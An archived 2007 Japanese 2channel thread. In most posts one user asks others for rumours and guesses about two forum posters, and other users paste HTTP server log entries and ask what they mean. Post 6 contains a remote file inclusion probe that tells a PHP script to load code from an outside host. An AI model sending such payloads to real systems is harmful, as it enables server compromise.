5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ツユチャンの質問!

1 :ツユチャン:2007/04/12(木) 14:56:18 ID:???
突然ですが、はじめまして、ツユチャン言います。
お願いしたい事があります。
このふたりの情報を、集めています。
あぼーんさんと、超絶魔界波動残酷冷徹戦士闇暗殺丸百二十世さんです。
誰でも、構いません。
嘘でもいいし、こういう人達じゃないか?
予想! 推測! 憶測!
何でもいいですから、宜しくお願いします。
あと、おもしろい人達の情報が、あれば教えてください。
題して「2チャンネル ウケてる奴等!」のコーナーに、情報をお願いします。
そんな物は、ある訳ないですが、仕方ないので、ここに貼ってください。
宜しくお願いします。

(補足説明)

あぼーんさんの場合
突然、やって来て、あぼーんと、ただ一言と書いて立ち去る 。

超絶魔界波動残酷冷徹戦士闇暗殺丸百二十世さんの場合
同じアドレスを連呼する、9行ぐらいを書きます。
あと、コメントも1行ぐらいで少ないです。


2 :2getter:2007/04/12(木) 15:12:10 ID:???
とりあえず2getしておく。⊂二二二( ^ω^)二⊃

3 :あd:2007/04/12(木) 17:05:34 ID:???
ここ数日、httpサーバーのログに以下のアクセスが急増しています。
191.hostxtremplus.com - - [12/Apr/2007:07:02:26 +0900] "POST /https://bad.vg/ HTTP/1
.0" 302 267 "-" "-"
これの目的を教えて下さい


4 :ツユチャン:2007/04/13(金) 22:56:07 ID:???
突然ですが、ツユチャンです。
ひとつわかりましたので、お知らせします。
超絶魔界波動残酷冷徹戦士闇暗殺丸百二十世さんは、
インディーズ・ミュージシャンなのだそうです。
少し、名前が長くないかい、言いにくいぞ!
分かってしまえば、詰まらないものです。
もっと、面白い物ものを期待していたのに、
的外れな感じです。
期待はずれ!切腹もの!残念!
でも、あぼーんさんは、正直に言って、期待しています。
あぼーんさんの情報を、誰か教えてください!
よろしく、お願いします。


5 :いやづら:2007/04/14(土) 01:07:17 ID:???
httpサーバーのログに以下のアクセスが急増しています。
219.128.12.3 - - [13/Apr/2007:07:21:11 +0900] "POST /https://hack.org?http://58.17.11.25/ HTTP/1 .0" 302 267 "-" "-"

また変わったのが増えてきました
これは何でしょうか


6 :いやづら:2007/04/14(土) 04:03:38 ID:???
b2.3d.1243.static.theplanet.com - - [30/Mar/2007:21:25:18 +0900] "GET /BE_config.php?_PSL[
classdir]=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 279 "-" "Morfeus Fucking Sca
nner"

ツール使ってスキャンしてきます
M.txtにアクセスするとリストに追加されますか?

7 :ツユチャン:2007/04/16(月) 20:57:58 ID:???
突然ですが、ツユチャンです。
面白い商品の宣伝の仕方をしている人を、
宣伝掲示板で見つけたので紹介します。
Iimonoさんという人で、
画像安定装置の「デジタルノイズキャンセラー」を宣伝しています。
どこが、面白いのかと言うと
商品は、たったの一品だけです!
それを毎日、同じ文句で書き込んで宣伝しています。
そして、そこにはサイトのアドレスも書き込んであるので行って見ると、
たぶんアフィリエイトサイトだと思いますが、
画像安定装置の商品写真があり、
あとは、宣伝文とメールアドレスがあるのみです。
こんなんで、本当に買う人がいるのでしょうか?
とっても、興味があります。
なにか情報をお持ちの方は、教えてください!


8 :ツユチャン:2007/04/17(火) 00:33:21 ID:???
続けて、ツユチャンです!
最新情報をお伝えします!
「インターネット」の板で、あぼーんさんを発見しました。
かなりの量の書込みがあります。
でも、あぼーんとしか書かないので、
何を言いたいのかよく分かりません
まったく、意味不明です。
ツユチャンが、思うには、彼は宇宙人だと思います。
それで、地球に来て初めて、憶えた言葉が、あぼーんではないかと思います。
でも、彼は、きっと聞き間違えたのか?
それとも、そう聞こえたのか?
よく分からないけれど、たぶん「あんぽんたん」を聞き間違えて、
憶えてしまったのだと思われます?
だから、その言葉の意味は理解していないと思われます。
それに加えて、まだ、彼は言葉を文字にかえて上手く表現出来ないと思われます。
そこで、彼は、お気に入りの覚えたての言葉である「あぼーん」を書き続けているのだと思われます。
しかし、彼は日本語を聞き取れて理解できると思いますので、
そのうち、日本語をもっと勉強して、掲示板にきちんと書き込めるようになると思います!
以上、報告を終わります。
追伸
あぼーんさんの新たなる情報の報告を期待していますので、
皆さん、よろしくお願いします!


5 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)